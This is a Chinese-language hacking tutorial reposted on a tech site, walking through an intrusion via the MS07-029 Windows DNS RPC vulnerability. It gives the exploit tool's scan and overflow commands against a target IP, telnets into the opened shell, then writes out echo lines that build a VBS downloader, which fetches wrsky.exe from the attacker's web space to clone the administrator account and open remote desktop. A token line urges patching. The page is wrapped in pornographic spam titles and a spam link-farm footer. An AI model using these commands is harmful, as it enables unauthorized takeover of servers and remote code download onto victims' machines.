成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

親身體驗(yàn)MS07-029漏洞入侵精簡(jiǎn)版

安全 黑客攻防
以下的文章主要是介紹親身體驗(yàn)MS07-029漏洞入侵,以下就是文章的主要內(nèi)容的詳細(xì)解析,望大家會(huì)對(duì)其有更好的收獲。

以下的文章主要向大家描述的是親身體驗(yàn)MS07-029漏洞入侵,在實(shí)際操作中有時(shí)系統(tǒng)漏洞對(duì)于企業(yè)服務(wù)器來說是具有致命作用的,黑客入侵時(shí)可以通過漏洞來獲得管理員權(quán)限從而將服務(wù)器玩弄于股掌之中。

MS07-029漏洞是一個(gè)服務(wù)器遠(yuǎn)程訪問漏洞,如果程序員沒有打上MS07-029漏洞補(bǔ)丁那么講受到致命的危害。所以在此提醒廣大的企業(yè)管理員,積極掃描自己的服務(wù)器,發(fā)現(xiàn)漏洞之后一定要及時(shí)采取行動(dòng),使得類似于MS07-029漏洞攻擊的情況避免出現(xiàn)。

我們先來看看所用工具的界面:

MS07-029漏洞入侵工具

這就是傳說中的利用工具,可以通殺2000SEVER,2003SEVER系統(tǒng),另外還具備了掃描功能!

先用它來對(duì)主機(jī)進(jìn)行掃描:

在我們的命令行下輸入:“dns –s 目標(biāo)IP地址”

稍等片刻,開放的端口以及操作系統(tǒng)以出現(xiàn)在我們面前,如果出現(xiàn)了“1029:Vulnerability”那么恭喜你,你馬上就會(huì)成功得到這臺(tái)主機(jī)的權(quán)限了

 

現(xiàn)在我們來最關(guān)鍵的步驟――溢出:

在命令行內(nèi)輸入

dns -2003chs *.*.93.189 1029

其中-2003ch的意思是操作系統(tǒng)的型號(hào),-2003chs即簡(jiǎn)體中文版的2003系統(tǒng),

如果是2000的系統(tǒng)就使用“-2000all”參數(shù),*.*.93.189就是我們的目標(biāo)IP地址,1029就是剛才掃描出存在漏洞的端口”。

出現(xiàn)“Attack sent ,check port 1100”字樣,說明已經(jīng)打開了目標(biāo)地址的1100端口,我們TELNET上去:TELNET *.*.93.189 1100

我們現(xiàn)在已經(jīng)成功的通過MS07-029漏洞入侵了對(duì)方的電腦,并且得到了管理員的權(quán)限。

下面我給大家介紹一下如何在肉雞上面開3389

在命令行里輸入

@echo with wscript:if .arguments.count^ tony.vbs

@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs

@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:"+web.status:.quit >> tony.vbs

@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs

大概的意思就是在命令行創(chuàng)立一個(gè)用來下載的VBS腳本tony.vbs

然后把開3389的工具上傳到你的個(gè)人空間,

我這里用的是火狐開3389的工具,在命令行里輸入 cscript tony.vbs http://你空間地址/wrsky.exe c:\wrsky.exe

wrsky.exe -c”可以克隆當(dāng)前管理員帳號(hào)

再輸入“c:\wrsky.exe -o 3551”

意思就是打開對(duì)方的遠(yuǎn)程桌面服務(wù),并且使用3551端口。

用“wrsky.exe -k”可以檢查3389是否開啟,開啟以后輸入“wrsky.exe -r”,對(duì)方的電腦就自動(dòng)重啟以后就可以連接上去了。

在運(yùn)行里輸入"mstsc",登陸上去。

那熟悉而又親切的畫面出現(xiàn)在我們面前了。

如果是2K的系統(tǒng),還有一個(gè)更加傻瓜化的工具open3389,直接運(yùn)行就可以了,不需要任何參數(shù),不過對(duì)方電腦會(huì)馬上重啟。

另外我還放了其他兩個(gè)DNS利用工具和一篇ZWELL的精華文章在光盤里,有興趣的朋友可以自己研究。

這個(gè)漏洞的危害是是分巨大的,目前利用DNS服務(wù)RPC漏洞傳播的蠕蟲病毒VanBot已經(jīng)出現(xiàn),變種已經(jīng)開始瘋狂傳播。以上的相關(guān)內(nèi)容就是對(duì)親身體驗(yàn)MS07-029漏洞入侵的介紹,望你能有所收獲。

 

責(zé)任編輯:佚名 來源: hi.baidu.com
相關(guān)推薦

2010-09-16 14:36:20

2010-09-16 08:14:00

2011-12-29 10:13:48

FirefoxAndroid版

2010-09-17 17:41:54

2010-09-17 16:01:55

代碼執(zhí)行漏洞EXE文件

2010-06-12 17:12:21

PPPOE協(xié)議

2010-05-20 14:46:34

2013-01-22 14:05:25

Fedora 18

2010-09-17 15:36:21

2011-09-02 13:38:56

PhoneGap插件Android

2012-04-16 13:22:56

CORBAJavaC++

2015-06-29 10:05:10

C#異步編程解析

2011-05-06 17:57:34

思維R800掃描儀

2013-01-22 11:29:01

3D打印

2010-09-16 16:12:24

2010-09-17 17:14:48

手工添加

2011-03-31 10:21:52

CentosCactishell

2010-09-17 16:31:02

2010-02-02 14:13:31

VMware Tool

2010-09-15 14:28:06

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

主站蜘蛛池模板: 亚洲一区二区三区免费在线观看 | heyzo在线| 亚洲一区二区三区在线 | 日韩中文字幕在线播放 | 一级黄色片免费 | 欧美h| 卡通动漫第一页 | 久久亚洲天堂 | 精品国产色 | 国产精品欧美一区二区三区 | 亚洲 中文 欧美 日韩 在线观看 | 精品美女久久久久久免费 | 你懂的在线视频播放 | 国产女人与拘做受免费视频 | 欧美性久久久 | h视频免费在线观看 | 亚洲电影免费 | 超碰人人插 | 国产精品久久久久久久久久久久久久 | 国产成人高清在线观看 | 久草新在线| 狠狠撸在线视频 | wwwxxx国产 | 麻豆久久久久 | 午夜影院官网 | 亚洲一区 | 啪啪精品| 狠狠亚洲| 高清av电影 | 日韩在线免费 | 亚洲国产一区二区三区四区 | 午夜av在线| 九九综合 | 国产精品毛片 | 男女羞羞视频在线 | 精品美女久久久 | 免费成人在线网站 | 国产精品18久久久久久久 | 玖玖色在线视频 | 6996成人影院网在线播放 | 午夜小视频在线播放 |